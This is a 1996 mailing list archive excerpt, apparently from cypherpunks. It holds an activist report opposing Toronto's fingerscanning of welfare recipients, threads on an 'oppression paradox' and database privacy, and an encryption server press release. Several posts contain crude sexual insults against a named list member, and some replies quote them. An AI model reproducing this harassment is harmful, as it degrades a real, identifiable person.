BOYCOTT THE ROYAL BANK. Put pressure on them to withdraw from the consortium. People have already pulled their student loans, accounts, and RRSPs from the Bank Contact: Orenda Davis (519)763-5292 , or Sarah Vance (519)763-6726 . Date: Mon, 16 Sep 1996 23:22:19 -0400 (EDT) From: Sarah Vance Subject: at last... the fingerscanning info doc. (fwd) [...] METRO TORONTO AND THE FINGERSCANNING SCHEME: SOME OF THE FACTS THEY AREN'T TELLING US For the last few years some of the people from Metro social services have been working with large corporations to develop a program for fingerscanning people on welfare. On June 19, 1996 Metro Toronto Council passed a decision recommending that this program be implemented as soon as possible, probably starting at the beginning of 1997. The program is complicated, and full of very serious problems that have not been discussed in the mainstream media. Soooo... I've tried to use plain english to explain what's going on, and how fingerscanning will effect people on welfare, and society in general if it is implemented. If parts of this "report" aren't clear, or if it is missing any important info please contact me (sarah) so I can revise it. (my number and email are listed at the end) PART I: THE BASICS... WHAT IS IT AND HOW WOULD IT WORK? What is biometric identification? -the use of someone's body to identify them, whether it's by fingerscanning, retinal scans etc.. What happens to someone when they get fingerscanned? -when you apply for welfare you would put a couple of your fingers into the scanning machine. That machine takes your fingerprint pattern and converts into a unique set of numbers and letters, a "bioscrypt". It's kind of like having your fingerprint turned into a bar code that is held in the computer's database. Who has access to the fingerscans? The bar code is, at least according to the information I've been able to find, accessible to anyone. It is just stored in the computer, so that the computer won't accept your fingerprint (or bar code) if you try to apply for welfare again. Metro council is recommending that the bar codes be destroyed three months after someone goes off of social assistance. According to them, the only person who could access these numbers would be the person responsible for maintaining the system. This person only accesses the system periodically to make sure that bioscrypts have been destroyed at the appropriate time. How often will people on welfare have to be fingerscanned? -although Metro officials say that people will only be fingerscanned when they register for welfare, Metro Committee documents imply that biometric id will be used more often than that... Human Services Committee Report #8, pg.11, (A) improving customer identification says.."CIBS will address...ongoing confirmation of identity" (I underlined that) "Biometric technologies give customers a fast, non-intrusive and very reliable way to provide indisputable proof of identity - even if they have no other identification." but, since other id like a driver's licence etc.. will still have to be used for enrollment, the only way this statement can be true is if Metro is planning on fingerscanning people on welfare at other times as well. ("CIBS" is what they're calling the program, it stands for "Client Identification and Benefit System") Who is getting paid to develop this program? -the Royal Bank, Great West Life Assurance, and Unisys Canada are heading the group (or "consortium") that has won this contract What is the Royal Bank's role in fingerscanning? -they are providing a Metro Social Services Royal Bank account that anyone on welfare who doesn't currently have a bank account will get their money from What is Great West Life Assurance's role? -they are developing a benefits card that welfare recipients will use at the dentist's etc. instead of vouchers What is Unisys' role? -right now Unisys wants to provide the computer administrative backup for the program. They also have biometric identification technology which they hope to sell to Metro social services. Who is providing the biometric technology for this project? -they haven't finalized which particular type of biometric id they will use yet (it will almost certainly be fingerscanning) once they do decide, THEN they will start negotiating contracts with people that sell the technology...among these corporations are Unisys Canada and Mytec. How would the system change the way people get access to their money? -people who already have bank accounts will get their money direct deposited into their accounts (for many the way they access their money won't change) -people who don't have bank accounts get Royal Bank cards that they'll take to Royal Bank machines to withdraw their money. As of yet, there are no provisions for people to get their money any way other than by using a Royal Bank machine--they won't be allowed to go to tellers to take out their money. No one is sure about what provisions will be made for bank user fees--i.e. Interac charges. Where else is this happening? -In several places across the US (eg. Los Angeles and Alameda Counties, in California, Ohio etc..) -In Spain fingerscanning is being used on the unemployed How soon is Metro Toronto hoping to implement it? -They hope to finish their negotiations and start implementing fingerscanning as early as January of 1997. Would fingerscanning be mandatory? -no. at first it would only be coerced (see the section on risks of refusal, under part 7). But Metro council recommended making it mandatory in the future. Right now their lawyers are advising them that they will run into serious human rights battles if they try to make fingerscanning mandatory right away. PART 2: SPEAKING THEIR LANGUAGE...THE MONEY ARGUMENT How much fraud is there in the welfare system?? -between 0.5% and 3% of welfare cases are fraudulent (ie "double-dippers --meaning that they are receiving cheques from more than one office). This figure has been confirmed by Liberal and NDP studies, it and includes administrative errors. -one Metro councillor has stated that fraud is actually no more than 0.5% -of the 10 000 calls received by Metro's fraud line, only 0.7% were confirmed as double-dippers (globe, June 20) most of the people that were reported weren't even on welfare -when discussing the amount of fraud in the welfare system it is essential to ask why people on social assistance commit fraud. This requires ackowledging that in 1993 (before the 21.6% cut to assistance cheques) maximum welfare payments were still well below Stats Canada's poverty line How much of taxpayer's money will it cost to install the system? -$4-8 million to install for Metro (globe and mail, june 20) -the cost is of installation is still being negotiated -as far as I know, no one involved in the planning of the project has released estimates of the cost of training social service workers to use the system, of changing the computer filing system, of maintaining the new system etc... but these costs are sure to be substantial Will taxpayer's money be used to pay for the royal bank for user fees so that social assistance recipients can get bank accounts (even though that's not what many of them want)? yep. If people get bank accounts, won't they get service charges as well? -"We'll all have to bear some of the pain", says Bank executive Brett Fleming. He claims that the Royal Bank will probably pay for at least two uses of Interac per month per recipient, and that social services will probably pay for 5 more. So... if, as Brett Fleming estimates, Metro pays for recipients to get 5 free uses of Interac per month, how much will that cost? -there are 104 000 social assistance cases in Metro, 30% of them don't presently have bank accounts and therefore will have pseudo accounts set up at the Royal. That means that 31 200 new accounts will be set up at the royal for welfare recipients. FOR ONE MONTH 31 200 accounts x $6.25 5 interac charges @ $1.25/each $195 000 per month in cost to taxpayers -> additional Bank profit FOR ONE YEAR $195 000 /month x 12 months $2 340 000 per year in cost to taxpayers--> additional Bank profit FOR FIVE YEARS $2 340 000 /year x 5 years $11 700 000 in five years in cost to taxpayers-->additional Bank profit*** ***note: this calculation is made under the assumption that Interac charges will not increase in the next five years, and that welfare rolls will remain the same size But can't these costs be avoided by encouraging assistance recipients to use Royal Bank branches rather than bank machines? no. Assistance recipients who are provided with pseudo Royal Bank accounts will not be allowed to use bank branches, they will only be allowed to use bank machines. What is vendor fraud and will the system help to decrease it? -vendor fraud is fraud committed by professionals who provide government paid benefits to people on welfare (eg. dentists). Although the Royal Bank has stated that the thrust of the whole program is to decrease vendor fraud little proof has been provided so far that this will actually happen. -they argue that the paper vouchers that used to be used by welfare recipients to pay for dental repairs, for instance, can fairly easily be reproduced making it easy for vendors to charge the government for more services than they actually provide. These paper vouchers are to be replaced by electronic cards so that the problem of duplication will be eliminated. It is possible that the benefit card could deter vendor fraud to some extent; However vendor fraud can easily occur in other ways (eg. By overcharging for services, or by charging for services that aren't neccessary.... -Also, and most importantly, detering vendor fraud has nothing to do with biometrically identifying welfare recipients. If Metro Toronto wishes to use the benefit card to deter fraud (although the merits of this system are dubious) this could more inexpensively be done, and more sensibly be done, with out being attached to biometrical identification of the poor. Will fingerscanning save money in the longrun? -This is questionable: New Zealand instituted this system, but ended up abandoning it because its costs of implementation and maintenance far outweighed the amount saved from reduced fraud. PART 3: STIGMATIZATION -Metro argues that they aim to decrease stigmatization of welfare recipients by replacing cheques with bank cards, but at the same time they are thinking about using this system to start forcing poor people to use welfare benefit cards instead of cash for food, clothing, tuition and other basic needs. How does this criminalize welfare recipients? -some people argue that the only reason fingerscanning is seen as criminalizing is because it is confused with fingerprinting. It is true that fingerscanning technology is quite different from actual fingerprinting, but this does not erase the common element shared by both techniques: When a person is fingerprinted by the police it is because they are suspected of a crime, they are considered suspicious and are therefore scrutinized. When a person is fingerscanned for welfare it is also because they are suspected of a crime. The crime is fraud, and by virtue of being poor and dependant on state funds you are automatically considered suspicious and therefore scrutinized. -by spending millions on this system the government is helping to perpetuate the myth that our economic problems are caused by the poor. PART 4: ISSUES OF ACCESS Will fingerscanning make it easier for people who don't have "proper" identification to register for benefits? -NO. Even though this argument is often put forward, you will still have to have exactly the same types of identification to apply for welfare. Metro Human Services Committee report reads, "Conventional forms of identification (e.g. driver's licence, birth certificate) will continue to be required to establish initial eligibility for social assistance." (p.11, (A) Improving Customer Identification) If welfare recipients are only allowed to withdraw money from bank machines, how will people who have mental illnesses; do not read english or french; or have cultural or personal reasons for not using bank machines; be able to get their money? -the Royal Bank says that they will provide one training session in which people will be shown how to use bank machines. However, unless this session 1) trains people not to have mental illness 2) dismantles the cultural barriers to using bank machines and 3) teaches people to read and write english or french, many of the 31 200 people and their families who don't currently have bank accounts will not have access to their assistance funds. PART 5: ISSUES OF CORPORATE AND GOVERNMENT CONTROL How could the project bring more corporate control to the welfare system? -The idea of bringing in corporate sponsorship is brought up again and again in Metro Committee documents... pg.3, recommendation #2 that "the Corporate Administration Committee approve the continued participation of Metro Corporate and Human Resources in the systems and financial development of C.I.B.S. and the further exploration of the feasibility of C.I.B.S. applications to other corporate initiatives" the future of the welfare system??? pg.15, (B) (II) "the delivery foundation established by CIBS will give the Division unprecedented flexibility in the administration of program benefits. One advantage could be to use this flexibility to optimize customer purchasing power by obtaining credits for our customers from various suppliers - supermarket chains, drug chains, educational institutions, dental clinics, property management companies, clothing stores." -This statement very strongly urges corporate sponsorship. Right now program benefits like dental care only cover certain services (eg fillings), and are only available to certain cash amounts. The insinuation is that any corporate benefit credits from grocery stores, clothing stores,etc. would be handled in the same way. ie. you would only be able to spend a certain amount on food, clothing, education etc. You would only be able to buy certain items, you would only be able to live in certain places. It makes it possible for the government to do things like make it impossible for you to buy cigarettes and junk food with your food credit. It makes it possible for governements of the future to control whether or not you are allowed to buy birth control and what typesof birth control you are allowed to buy. Whatever companies sponsored the program would be the only ones that you could buy from, even if their prices are higher than other stores, even if they aren't located near your home, even if you have cultural/personal/political reasons for not wanting to shop at these large corporations. It means that poor people would no longer be entitled to basic freedoms of choice. And like with dental benefits now, the location, time and details of your purchases would be recorded. The kind of underwear you buy, what you buy at the grocery store, what type of drugs you purchase, would all be recorded by the government. It opens the door for a frightening amount of government and corporate control and surveillance. PART 6: A SYSTEM DESIGNED FOR EXPANSION-- WELFARE RECIPIENTS AS GUINEA PIGS. Could fingerscanning of welfare recipients expand beyond Metro Toronto in the future? -yes, Metro council recommended that they consider making it nationwide in the future. "By working with its private sector partners to build an integrated customer identification and disbursement system that meets the operational and business needs of a large income support program, Metro will gain valuable experience and expertise that can be applied to other jurisdictions." (pg.7 (II) ) -they are also talking about selling this program to other areas, pg.7, (II) "There is also the potential for future revenues related to the sale of specific applications developed for Metro to other jurisdictions. There is clear interest in the approach the Division is taking, and the results that will be achieved. Could fingerscanning be used for other government programs? -Metro Human Services Committee report (#8) explains that, "recently, the Provincial government has announced it is assessing the development of an identification card that could cover a range of programs.... C.I.B.S. employs technologies that will very likely be compatible, and can be incorporated, with prospective provincial applications." (p.7, comments and discussion Part I (c). The report goes on to clearly explain that one of the reasons for developing biometric id for welfare recipients is because they want to be prepared for when the province starts using fingerscanning for other areas. -Mytec, one of the companies competing to supply the biometric technology also hopes to apply it to (among other things) Canadian immigration and healthcare. -The spread of biometric identification has worked similarly in the US...It's use on welfare recipients has gradually become more and more widespread. The acceptance of its use for this purpose has made it possible for the country to move in the direction of using biometric id for a wide variety of services. In Febuary, Congress discussed a bill that called for fingerscanning every resident of the US over the age of 16 in order to develop a centralized database of information that would have been made available to a wide variety of government and corporate interests, including anyone who claims to be a potential employer. Now that fingerscanning for government services has become entrenched in the United States it is extremely difficult for people to fight against its use. People on welfare in Toronto can be seen as the test case for widespread use of fingerscanning in Canada, the beginning of a slippery slope. PART 7: FIGHTING BACK Legal Battles -Several groups in Toronto are confronting this issue as a human rights violation. Their strategy is to use the courts in order to have fingerscanning struck down. What can people on welfare do to fight against this? -Gather and publicize information about this issue (eg. through leafletting, press releases, demonstrations, stickering, civil disobedience, street theatre...) -Join the Toronto coalition being formed by the Toronto-based group "Low Income Families Together" -Speak to one of the legal groups interested in pursuing fingerscanning as a human rights issue (contact Elinor Mahoney at Parkdale Legal Services, for instance) -Refuse to be fingerscanned. (So far you are legally entitled to do this, however there are risks involved that you may or may not be able to take). Some of these risks are.... Getting your cheque later than otherwise, (which could make it difficult to pay bills on time), being treated as suspicious by social service workers, being harrassed What can anyone do if they're concerned about fingerscanning? -Make funds and support available for people on welfare who choose not to be scanned -Join the Toronto Coalition against fingerscanning being formed by Low Income Families Together -Join the province-wide campaign against fingerscanning by talking with any of the contacts listed below -Gather and publicize info about this issue (eg through leafletting, demonstrations, press releases, stickering, civil disobedience, street theatre...) *the campaign against fingerscanning can provide you with leaflets, posters, info, contacts in your area... -voice your concerns LOUDLY to Metro Council -Donate resources.... photocopying, faxing, use of phones, artistic talent, your TIME, your skills (eg. with dealing with media, with strategizing, with caring for children so people who often don't get a chance to participate in political activities can get involved..), your computer, your legal advice/representation.... -Boycott the Royal Bank to put pressure on them to withdraw from the consortium (this is the thrust of the Campaign against Fingerscanning's strategy...people have already withdrawn their student loans, accounts, and RRSPs from the Bank) Who can I get more information from? Contact.... Guelph: Orenda Davis (519)763-5292, or Sarah Vance (519)763-6726 Toronto: Kirsten at Low Income Families Together (416)597-9400 or fax: (416)597-2128 or email or From andrew_loewenstern at il.us.swissbank.com Fri Sep 20 16:41:31 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Sat, 21 Sep 1996 07:41:31 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: <9609202023.AA01121@ch1d157nwk> Douglas Renner writes: > Those of you who took Logic 1001 will recall the paradox known > as "The Heap" which goes like this: Hey, a liberty here, some freedom there, and pretty soon you're talking about real totalitarianism! andrew "It could never happen here." From hevnsnt at ksu.edu Fri Sep 20 17:14:42 1996 From: hevnsnt at ksu.edu (Y Do U Care) Date: Sat, 21 Sep 1996 08:14:42 +0800 Subject: unscribe cypherpunks@toad.com In-Reply-To: <199609191939.PAA21770@jekyll.piermont.com> Message-ID: On Thu, 19 Sep 1996, Perry E. Metzger wrote: > > Steve Dyson writes: > > unscribe cypherpunks at toad.com > > Never. > unscribe cypherpunks at toad.com From jeremey at veriweb.com Fri Sep 20 17:18:57 1996 From: jeremey at veriweb.com (Jeremey Barrett) Date: Sat, 21 Sep 1996 08:18:57 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Well I'm just grumpy enough right now to tear this apart... :) On Fri, 20 Sep 1996, Douglas B. Renner wrote: > Those of you who took Logic 1001 will recall the paradox known as > "The Heap" which goes like this: > > 1. A single grain of sand does not constitute a heap of sand. An debatable but valid assumption. > 2. You can create a heap from a non-heap by adding a single grain of sand. How is a non-heap defined? 1 grain? 0 grains? If (2) is to be true, it can't be 0, since you assumed (1), so a non-heap must be 1 grain. > 3. Therefore, there is *NO SUCH THING* as a heap of sand. Huh? How do you draw that conclusion? (1) and (2) are not contradictory in any way. You said 1 grain is not a heap, but >1 is. Fine. Valid way of defining a heap/non-heap of sand. Nothing to do with (3). > > You with me here? Okay, this is important, because the public actually does > think like this: Very debatable. Very general. > > 1. Our current society in America is not oppressive. (generally accepted) Very debatable. > > 2. You cannot change a non-oppressive society into an oppressive society > by removing one liberty from its citizens. (also generally accepted) Rubbish. If the government removes all liberties at once, that's oppressive, but if they do it one at a time, it's not? > > 3. Therefore, it is not possible for America to become an oppressive society. > More Rubbish. Not only are your assumptions flawed, but the heap argument and the oppression argument are entirely unrelated. Nothing personal, mind you. :) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jeremey Barrett Senior Software Engineer jeremey at veriweb.com VeriWeb Internet Corp. http://www.veriweb.com/ PGP Key fingerprint = 3B 42 1E D4 4B 17 0D 80 DC 59 6F 59 04 C3 83 64 PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html "less is more." -- Mies van de Rohe. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkMLVC/fy+vkqMxNAQFHsgQAmK/nDEVv17ntZ2k172/S5ps4nYJeCFjM 4Ek8eOTG54pju5CYAZBTAYIOZNX4iDp4vK3Qyj3d1PAqpLCqQPJo3/Zr/dz21RH8 RkIP4IvEyFGNzpedh1yFe8wj8zGOPXk9OdblNujx8fFmThuk02zUJyUG+GDxBdDa zQGuNpTT7H8= =MFgt -----END PGP SIGNATURE----- From markm at voicenet.com Fri Sep 20 17:22:04 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 21 Sep 1996 08:22:04 +0800 Subject: ANYONES CREDIT CARD # per your request. In-Reply-To: <9609201825.AA18161@super.mhv.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Sep 1996, Lynne L. Harrison wrote: > You can go to their web page (http://www.lexis-nexis.com), click "Just > In" and request via email that your name be removed from their database by > filling out the form. > Problem, of course, is that one doesn't know if one's name and info is in > the database unless one is a subscriber and can look it up. I, personally, > do not feel comfortable in filling out a form with my personal info and > sending it along - 1) for the obvious reasons; and 2) what if I'm not even > in their nefarious database? If not, then I've just entered my personal > info and sent it on its merry way to whomever and wherever unnecessarily - > whether by email, fax, or snail mail. There is an easy technical solution to this: store a one-way hash of each entry in a database field, so if one wants to be removed, all one has to do is send the one-way hash of their personal information. If there is a database entry that matches the hash, then it is up to the database maintainer to remove the entry. If there isn't a matching entry, then no personal information will have been given out. I wonder how many "privacy conscious" database maintainers will actually implement a scheme like this. > I tried just entering my name, email address, and state but, as > anticipated, received a msg that ALL info has to be supplied, so I'll chk > with someone I know that has an account to see if my name is there. > However, the BIGGEST problem I foresee with this database (and others > like it) is that someone eventually is going to hack it - and then watch the > fun and games ensue. TRW credit databases have been broken into many times, and they have more information then Lexis-Nexis (credit-card numbers minus the last four digits, addresses, telephone numbers, and of course, credit histories). Nothing really devestating has happened because of these incidents. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkMMxSzIPc7jvyFpAQFoiggAusskPBsG0cvMXYcCmJaJR6Rlbcny+48C byAs3Bg4E2aMHusyll2+t7GPX897VtVGm1iBaAKZFkfFcyQcHoq+aw+hqJseG/As Yz3x6702e6y4qOfv+JpyCJk9c19ys4XSkHqsrJl3txFvakrBP4xfstWtDKk2P1EH 4aIDvEaStdabqhMQqayKqU09tLY6A++XZ5zbzK/ovVDQIgCW2cDsmtYTo8ZVktPq PqTnaHVY7B3oj+XEl7sfS1qKew4KEJiClmlztA7Lk7Kn6Zo6TnBPKOICFHjlnOyy +gitMH7yYuGVo95jcRzImyDMm6z2mjcHTVlmEnxK2k85PtR9El3ZuQ== =zaz8 -----END PGP SIGNATURE----- From jbugden at smtplink.alis.ca Fri Sep 20 17:30:39 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 21 Sep 1996 08:30:39 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the ... Message-ID: <9608208432.AA843266540@smtplink.alis.ca> Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s nobody at cypherpunks.ca (John Anonymous MacDonald) wrote: >Tim C Maya studied yoga back-streching exercises for > five years so he could blow himself. Tim! Is the course still offered! Where do I sign up! James Q: Why does a dog lick itself? From dlv at bwalk.dm.com Fri Sep 20 18:37:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 09:37:14 +0800 Subject: Dimitri Spams In-Reply-To: Message-ID: Ray Arachelian writes: > Dimitri, get a life! We need Dimitri Spams as much as we needed > Perrygrams. Which is to say, we need them not at all! I see you lied when you claimed to have killfiled me. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jeremey at veriweb.com Fri Sep 20 18:39:58 1996 From: jeremey at veriweb.com (Jeremey Barrett) Date: Sat, 21 Sep 1996 09:39:58 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Sep 1996, Douglas B. Renner wrote: > > > On Fri, 20 Sep 1996, Jeremey Barrett wrote: > > > > Rubbish. If the government removes all liberties at once, that's > > > If I went over your head, I apologize! > The point of a paradox such as this is to illustrate something which is > OBVIOUSLY FALLACIOUS, so that we might learn from it. The intention is > to make us *think*. I have seen many a post more foolish that was intended in all seriousness. My point is that neither your first nor second arguments are a paradox, nor do they relate to one another. I agree that many people may not see their freedoms being whittled away, simply because they are being whittled away, as opposed to eliminated all at once. If that is your point however, it was unclear. Apologies if you were upset by my response. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jeremey Barrett Senior Software Engineer jeremey at veriweb.com VeriWeb Internet Corp. http://www.veriweb.com/ PGP Key fingerprint = 3B 42 1E D4 4B 17 0D 80 DC 59 6F 59 04 C3 83 64 PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html "less is more." -- Mies van de Rohe. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkMoUy/fy+vkqMxNAQFQIQP/UNUTD+MtbSpYZhLNNGcUXqzgRcA//8EO 7SJknZWlm2vHtd5siVOd847H9g+hJ5K9CdrzxgQgCUz4LT8FwZ5peLmM+gDvONGx XIZl3CSMlSv90msR50h8f1glMUiRJa2Q7vbIcj46GEwZx3U67bJe+MSdMcHumK8U /RPKQ96qkdQ= =u4aS -----END PGP SIGNATURE----- From dougr at skypoint-gw.globelle.com Fri Sep 20 18:41:44 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Sat, 21 Sep 1996 09:41:44 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: On Fri, 20 Sep 1996, Jeremey Barrett wrote: > > Rubbish. If the government removes all liberties at once, that's If I went over your head, I apologize! The point of a paradox such as this is to illustrate something which is OBVIOUSLY FALLACIOUS, so that we might learn from it. The intention is to make us *think*. -Doug From sameer at c2.net Fri Sep 20 18:45:17 1996 From: sameer at c2.net (sameer) Date: Sat, 21 Sep 1996 09:45:17 +0800 Subject: C2NET AND UK WEB OFFER UNCRIPPLED SECURITY SOFTWARE TO WEB USERS IN ALL COUNTRIES Message-ID: <199609202332.QAA13460@lachesis.c2.net> For Release Sept. 20, 1996 C2Net: Sandy Sandfort +1 510-986-8770 UK Web: Dave Williams +44 0113 222 0046 C2NET AND UK WEB OFFER UNCRIPPLED SECURITY SOFTWARE TO WEB USERS IN ALL COUNTRIES LEEDS - Today, UK Web Ltd. and C2Net (Community ConneXion, Inc.) announced the worldwide availability of Stronghold security software for the World Wide Web. Stronghold is a commercial version of Apache, a powerful and popular server software package for the Internet. Stronghold uses "Secure Sockets Layer" (SSL), a cryptographically strong protocol to protect credit card numbers and other sensitive information from Internet eavesdroppers. Stronghold also comes with a full range of "certificate authority" tools, documentation, easy installation, and technical support. Export versions of other Web servers, such as the Netscape Enterprise and Microsoft Internet Information Server have intentionally crippled encryption security. Stronghold uses uncompromised strong encryption world-wide. This is possible because it was written using software developed outside the US. Stronghold uses the full power of 128-bit symmetric encryption for maximum security. (Competing servers exported from the US use only 40-bit, low-level security). Stronghold is fully compatible with all secure browsers, including Netscape Navigator and Microsoft and Internet Explorer. "Stronghold is based on the most powerful Web server and the most secure Internet encryption," says Mark Cox, Stronghold product manager. "Users of Stronghold can be sure that their commercial transactions are completely private and secure." Dave Williams, Managing Director of UK Web, adds "Stronghold has already proved very popular in the US and Canada, where it has been available nearly a year. UK Web will now be selling Stronghold exclusively outside the US and Canada, giving the rest of the world the first opportunity to buy this top-rated product. We think it will be very popular." UK Web is a leading authority on the Apache web server. They are committed to information-sharing and openness. They also offers commercial support for Apache. UK Web publishes a weekly newsletter called "Apache Week" which is available free of charge on the Internet. The Apache Week Web site can be found at http://www.apacheweek.com/. "In the past year the demand for an international version of Stronghold has been steadily increasing," said Sameer Parekh, President of C2Net, "but we've never been willing to give our customers a false sense of security by shipping a defective product. We're very glad UK Web can satisfy the need for an international version of Stronghold."" International Stronghold costs 329 pounds, which includes free minor upgrades. It is free for non-commercial use by educational and not-for-profit organisations. Full server source code is provided as well as the pre-compiled server. It is available the most commonly used Unix platforms, including Linux, SunOS 4, Solaris 2, IRIX and AIX. The server is based on the popular Apache module API, which gives access to a wide range of third-party server add-on "modules", most available for free. Within the United States and Canada Stronghold is available from C2Net. (See http://stronghold.c2.net/) Full details of International Stronghold are available on the UK Web's web site, at http://stronghold.ukweb.com/. The software is available for free download and evaluation. UK Web Limited is a leading Internet services company specialising in server technology, Internet security, business solutions and effective site design. C2Net (also known as Community ConneXion, Inc.) is the leading provider of uncompromising security on the Internet. C2Net provides a wide array of Internet privacy services and powerful network security software. Portions of Stronghold were developed by the Apache Group, and were taken with permission from the Apache Server http://www.apache.org/. This product includes software developed by Ben Laurie for use in the Apache-SSL HTTP server project. This product includes software developed by Eric Young (eay at mincom.oz.au). Netscape Navigator and Netscape Enterprise are trademarks of Netscape Communications Corporation. Microsoft Internet Explorer and Microsoft Internet Information Server are trademarks of Microsoft Corporation. Stronghold is a trademark of Community ConneXion, Inc. From sunder at brainlink.com Fri Sep 20 19:05:34 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Sat, 21 Sep 1996 10:05:34 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the lying sack , of shit In-Reply-To: <199609201738.KAA00561@abraham.cs.berkeley.edu> Message-ID: On Fri, 20 Sep 1996, John Anonymous MacDonald wrote: > Tim C[ocksucker] Maya studied yoga back-streching exercises for > five years so he could blow himself (nobody else will). Likely the NSA has nothing better to do these days. They got bored with just listening, so now they're spamming. Can we lock this fucker out of the list? Sure, he'll probably pick another nym to post from... ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From pgf at acadian.net Fri Sep 20 20:03:25 1996 From: pgf at acadian.net (Phil Fraering) Date: Sat, 21 Sep 1996 11:03:25 +0800 Subject: How's the list? Message-ID: I thought I'd ask how the list is going... it seems to have gone downhill; there are now totally gratoitous insults to tcmay that don't seem to serve any purpose besides making sure the archive (if there is one) isn't fit for family viewing. Hey, at least when I was insensitive, I put effort into it. And I didn't use an automatic daemon. Anyway, I thought I'd catch up on current events with the following questions: * I take it SSL still hasn't been strengthened? * I'm now working part of the time at a company that has a lot of mail-order sales; are any of you aware of how much credit card fraud is going on out there right now? Might some of this actually be from unsecure SSL transactions? * Did anyone come up with any interesting embellishments (or maybe precedents?) to my bidirectional Dining Cryptographers idea? I can't believe I'm the first to come up with this... I guess it's public domain now, since I missed the one-year deadline for patenting it. Well, I gotta run... Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden" From rah at shipwright.com Fri Sep 20 20:05:16 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 21 Sep 1996 11:05:16 +0800 Subject: "This way to the egress" Message-ID: P.T. Barnum also said something about suckers, too... Cheers, Bob Hettinga ----------------- First Data, First USA Paymentech, GE Capital Invest in First Virtual Holdings Wednesday 96.09.18 - San Diego, CA USA - First Virtual Holdings, Inc., developer of Internet transaction systems, announced today that First Data Corp. and First USA Paymentech, Inc., two of the nation's largest credit card processing companies, and GE Capital have invested a total of $12.5 million in First Virtual Holdings, Inc. "This strategic alliance reinforces our belief that electronic commerce is coming of age on the Internet," said Lee Stein, chairman and chief executive officer of First Virtual. "It creates a powerful new combination between First Virtual, with its proven on-line transaction system, and leading credit card acquiring and processing companies. This represents a tremendous vote of confidence in our system by three industry leaders." In addition, the companies are discussing joint marketing agreements based on the concept of giving more than 200 million card holders automatic buying power on the Internet using the secure VirtualPIN(TM) identifier from First Virtual. "We expect that this partnership will enable First Virtual to significantly broaden its global marketing," Stein said. "Our secure e-mail based system is proven, easy to use and doesn't require specialized technologies. The VirtualPIN(TM) serves as the only identifier an individual needs for conducting business in cyberspace. It enables sellers and buyers on the Internet to link securely to any currency, payment system or standard verification system. With First Data, First USA Paymentech and GE Capital as partners, we anticipate more rapid acceptance of the Internet as an important distribution channel for businesses of all sizes." Stein said First Virtual created its VirtualPIN and Internet payment system to be part of a more complex transactional e-mail system for future marketing, customer service, communications and transaction applications. "The VirtualPIN provides the single identifier that can tie together all parts of the marketing and distribution chain: initial information, outbound offer, purchase order, confirmation, credit verification, transaction settlement and fulfilment of the order," said Stein. "The VirtualPIN serves as a convenient and secure alias for an individual's identity, including e- mail address and personal, demographic, shipping and financial information. This gives new power and privacy to the individual and puts him or her at the center of the electronic marketing universe." Stein said Pamela Patsley, chief executive officer of First USA Paymentech, Inc., and John McKinley, chief technology officer of GE Capital, have been elected to the First Virtual board of directors. ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From dlv at bwalk.dm.com Fri Sep 20 20:20:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:20:52 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the ... In-Reply-To: <9608208432.AA843266540@smtplink.alis.ca> Message-ID: jbugden at smtplink.alis.ca writes: > Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s > > > nobody at cypherpunks.ca (John Anonymous 